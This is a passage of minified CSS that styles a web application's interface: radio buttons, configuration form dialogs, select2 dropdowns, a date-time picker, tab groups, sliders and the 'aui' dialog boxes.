background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 